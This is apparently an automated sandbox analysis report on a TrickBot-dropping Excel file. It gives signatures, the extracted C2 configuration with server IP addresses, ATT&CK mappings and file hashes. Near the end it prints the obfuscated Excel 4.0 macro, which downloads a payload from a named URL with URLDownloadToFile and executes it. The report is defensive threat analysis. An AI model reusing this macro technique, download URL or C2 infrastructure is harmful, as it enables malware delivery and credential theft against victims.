Analysis Report 446446.xls
Overview
General Information
Detection
Hidden Macro 4.0 TrickBot
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Trickbot
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Office process drops PE file
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match
Classification
Startup |
---|
|
Malware Configuration |
---|
Threatname: Trickbot |
---|
{"ver": "2000028", "gtag": "rob52", "servs": ["89.250.208.42:449", "182.253.184.130:449", "31.211.85.110:443", "85.112.74.178:449", "102.68.17.97:443", "103.76.150.14:443", "96.9.77.142:443", "91.185.236.170:449", "87.76.1.81:449", "91.225.231.120:443", "62.213.14.166:443", "201.114.152.181:60304", "91.248.207.239:13871", "5.50.104.227:23468", "122.117.176.99:50289", "250.16.62.7:12037", "43.219.127.177:42389", "183.210.9.161:55813", "203.2.134.219:34188", "24.203.49.183:64402", "89.227.14.153:60566", "44.55.149.111:41730", "197.181.162.30:5798", "152.49.214.109:59125", "245.241.127.55:36657", "107.85.198.194:37398", "191.250.160.220:23460", "40.81.224.235:45065", "211.246.214.27:8638"], "autorun": ["pwgrab"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth |
|
Memory Dumps |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security |
Unpacked PEs |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
AV Detection: |
---|
Found malware configuration | Show sources |
Source: | Malware Configuration Extractor: |
Source: | File opened: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Found obfuscated Excel 4.0 Macro | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | OLE indicator, VBA macros: |
Source: | Dropped File: | ||
Source: | Dropped File: |
Source: | Matched rule: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Process created: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Code function: | ||
Source: | Code function: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Process created: |
Stealing of Sensitive Information: |
---|
Yara detected Trickbot | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality: |
---|
Yara detected Trickbot | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Process Injection11 | Masquerading121 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution33 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll321 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection11 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1138157 | Download File |
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse | ||
0% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
living-traditions.com | 64.207.186.30 | true | false |
| unknown |
clientconfig.passport.net | unknown | unknown | true |
| unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false |
| unknown | ||
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
64.207.186.30 | living-traditions.com | United States | 398110 | GO-DADDY-COM-LLCUS | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 385552 |
Start date: | 12.04.2021 |
Start time: | 17:11:27 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 7m 10s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | 446446.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Potential for more IOCs and behavior |
Number of analysed new started processes analysed: | 30 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal96.troj.expl.evad.winXLS@5/8@2/1 |
EGA Information: |
|
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
17:12:30 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
64.207.186.30 | Get hash | malicious | Browse |
|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
GO-DADDY-COM-LLCUS | Get hash | malicious | Browse |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 133926 |
Entropy (8bit): | 5.3703247507002985 |
Encrypted: | false |
SSDEEP: | 1536:/cQIKNEHBXA3gBwqpQ9DQW+zjM34ZldEKWGlOhIQX5ErLWME9:EVQ9DQW+zYXO8 |
MD5: | 9559FA6EB738D9BC9BC6833652EB4E4D |
SHA1: | 76522723B61DE9679B0D276B600E7A8860267B01 |
SHA-256: | 32E6DB996EAC4915BA6F963A9406C5B611BBBF295F24C516F99E6EC1FC0316D1 |
SHA-512: | 1A5ADED8BA8EE3C2783C3FEB993A3F306C5B7531F912F9A94DDBF9BF2FC7C11C670B2237694CFE0B2A1DB3F4F227FB5EFE21D00E66A7F2186F3FC51B4F43C626 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 449536 |
Entropy (8bit): | 5.5101637778448955 |
Encrypted: | false |
SSDEEP: | 6144:BqeyCMxv21VX5rHrP9HlIjlYVnvi5TnMTBs7xTUgzFxmSZ81gVRHZOXTulpwNF6c:Bq9CAvi3LlHXtiyTBITzwTCAa6dx |
MD5: | CBEA511BD35F247E4B4BF7CC5A3A7CBD |
SHA1: | 8C0D352934271350CFE6C00B7587E8DC8D062817 |
SHA-256: | 0AE86E5ABBC09E96F8C1155556CA6598C22AEBD73ACBBA8D59F2CE702D3115F8 |
SHA-512: | AEC894D9D3AACCCCC029C615D283AF4946C5150372DB0ECDD616A9D491478759068214BF03DB11631A5EFB59951150D92C1517C2C11D8C6F0DDF5C8F76734FCF |
Malicious: | true |
Joe Sandbox View: |
|
Reputation: | low |
IE Cache URL: | http://living-traditions.com/blogs/click.php |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 80472 |
Entropy (8bit): | 7.887674613462612 |
Encrypted: | false |
SSDEEP: | 1536:clJGmOQRbgrWGHKT7AeWRlMVGoIahaDHTU6hryF70KiQ:cbGmOQRbgrW2KT7g2sTU2yF70KiQ |
MD5: | 3806F1BA0C68ABABDAAD11C09F7E7C84 |
SHA1: | 2B1B86584B11EE9407A39D88B5044E403D7ACDEF |
SHA-256: | D65513C26BDE3DD4AE8DA9A7C16BE2540FD551D6D6674EEE7E0D9792881F99A1 |
SHA-512: | 88ADF638FD18E386F539610589BD0AD96F247A149B93CC589DCE8A3BB0B79D2BA2BC737EC297E1613FA95A0A902EAB55AAB3D628FFDF7E0084D4246677E7966F |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2066 |
Entropy (8bit): | 4.651416909086472 |
Encrypted: | false |
SSDEEP: | 24:8/dDWt4UxwQYA4Sbo0AaX7DMHF7aB6my/dDWt4UxwQYA4Sbo0AaX7DMHF7aB6m:8/YmvxS8Da8HIB6p/YmvxS8Da8HIB6 |
MD5: | 5AB3706D085881A1D4836C30CB8212C4 |
SHA1: | C6B634036314EA7D9308E7B10DE84E370DA37B9E |
SHA-256: | EC254D08DEA693D4456B6DFA2E215A7C2F8798202D09A7CC81924AD883629625 |
SHA-512: | 2C7E15C1EF6CFB4D129779ED69BF95F7B3FE735BF3F734276470B2097C2AFA1FCFC6CCEE0354DCA54BB77719710599715E110BEF4BEFF2E504F6AFE514CD7338 |
Malicious: | true |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 904 |
Entropy (8bit): | 4.643076575571524 |
Encrypted: | false |
SSDEEP: | 12:8iRcXUV3tHuElPCH2JgUxw7GhOX+WrjAZ/2bD03DLC5Lu4t2Y+xIBjKZm:8iRbt4Uxw6uAZiDMq87aB6m |
MD5: | EF3F360D18E0AF8661AFEACCC90C95B9 |
SHA1: | C8A408AFD5B1C569A55884F34482716D9E4E5E8A |
SHA-256: | 425B362E827F53278F7D587E1EC47AFEB3B3DA2BDBDF9E440B3B696583418954 |
SHA-512: | 32EE8CA8843B2E7F5B5B79680B6856A3C417484EEC79E192BB2EA131FA0DD99A67EF24173F02040115D1D4B136D27A2CF080DE19AED4C18D7C28EF3FEC9F6333 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 83 |
Entropy (8bit): | 4.062636835813932 |
Encrypted: | false |
SSDEEP: | 3:oyBVomMJRT3Ip273Ip2mMJRT3Ip2v:dj6J14LmJ142 |
MD5: | 546FBC897E0253FD4115B55013DB9EC5 |
SHA1: | 01C5E19E8AD4B7DB773765B0522E2524926CBE8E |
SHA-256: | 77F95B49BFF9A69DEC8FC0B77F48EBF54111EB7F4BDAD317A51C9A019FE250BF |
SHA-512: | 088C09B290FF9AA6E5D2BC373D19EFA034D2DF07B52A12F6B69B8B47FEA74ED6F4BD3EDDAF4B0E294E3556D752588AC7CC5B6F18B72FA391AB6091E07006D689 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 161733 |
Entropy (8bit): | 6.925925053233649 |
Encrypted: | false |
SSDEEP: | 3072:V78rmOAIyyzElBIL6lECbgBGzP5xLm7TK2jTUqyF70virW2akHGaakHh5o78rmOQ:p8rmOAIyyzElBIL6lECbgB+P5Nm7T5UW |
MD5: | 8F620D3AB90FC12134D008C890041FDA |
SHA1: | 07FFAE23C88B756A4FA3D0C8903B996EE05A1620 |
SHA-256: | D48665C8B028E9328061DF6988465D7F5B576EE3ED3B3214EE4138CC5E3119D9 |
SHA-512: | E3430608D5E3546AB186E9C42E48B2E49245AE79750F73A39CB81F1BC005B33F6F935A6874BA099079C02360B1494C98B1765A76875D42C5876ED6EB03A36C09 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 449536 |
Entropy (8bit): | 5.5101637778448955 |
Encrypted: | false |
SSDEEP: | 6144:BqeyCMxv21VX5rHrP9HlIjlYVnvi5TnMTBs7xTUgzFxmSZ81gVRHZOXTulpwNF6c:Bq9CAvi3LlHXtiyTBITzwTCAa6dx |
MD5: | CBEA511BD35F247E4B4BF7CC5A3A7CBD |
SHA1: | 8C0D352934271350CFE6C00B7587E8DC8D062817 |
SHA-256: | 0AE86E5ABBC09E96F8C1155556CA6598C22AEBD73ACBBA8D59F2CE702D3115F8 |
SHA-512: | AEC894D9D3AACCCCC029C615D283AF4946C5150372DB0ECDD616A9D491478759068214BF03DB11631A5EFB59951150D92C1517C2C11D8C6F0DDF5C8F76734FCF |
Malicious: | true |
Reputation: | low |
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 3.2150745788685295 |
File name: | 446446.xls |
File size: | 283136 |
MD5: | 1b62b4f4b16d6219dce4c6d145c5af79 |
SHA1: | d5bc46f3043119c020ae93121195aabbf151cf75 |
SHA256: | dd3ecdcc3a6cc81ee451f90703cc899ff43c7a05b30a6538e5f3afd73f77adb1 |
SHA512: | 1a774ebb111463491f16a88b465e959c14ba32b6a399f108abe43fef66e61b663840998efdcd504306f3b28dd052032b82e8e642ffc9f9ed05186aaedbaf420e |
SSDEEP: | 6144:DcPiTQAVW/89BQnmlcGvgZ7r3J8b5I2JK+2vYft:mwt |
File Content Preview: | ........................>.......................'..........................."...#...$...%...&.................................................................................................................................................................. |
File Icon |
---|
Icon Hash: | 74ecd4c6c3c6c4d8 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "446446.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-04-12 14:51:16 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.335261663834 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 86 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.244430475899 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . J . J . / . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00 |
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 270942 |
---|
General | |
---|---|
Stream Path: | Book |
File Type: | Applesoft BASIC program data, first line number 8 |
Stream Size: | 270942 |
Entropy: | 3.18416886572 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 2 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 6 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . |
Data Raw: | 09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
"=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CALL(Docs3!BX29&Docs3!BQ24&Docs3!BQ33&Docs3!BQ34,Docs3!BZ29&Docs3!CC33&Docs3!BY31&Docs3!CC35&Docs3!CC36,Docs3!CF29&Docs3!CF30,0,Docs3!BX9,Docs3!CD19,0,0)"=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=C
HAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=Docs1!BC13()
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=EXEC(Docs3!BS36&Docs3!BS37&Docs3!CF43&Docs3!CF44&Docs3!CD19&Docs3!BZ37&Docs3!BZ39&Docs3!BZ43&Docs3!BZ44)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=Docs3!BA22(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,http://living-traditions.com/blogs/click.php,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\fdinmd.fii,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,RL,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,U,,UR,,,,,,JJC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,CBB,,,,,,,,,,,,,,,,,,,,,,,,nload,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Mo,,,,,,,,,,,,LDow,,,,,,,,,,,,,,,,,,,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ToFil,,,,,,,,,,,,,,,,,,,,,r,,,,,,,,,,eA,,,,,,,,,,,,,,,,,,,,,u,,,,,,,",St",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,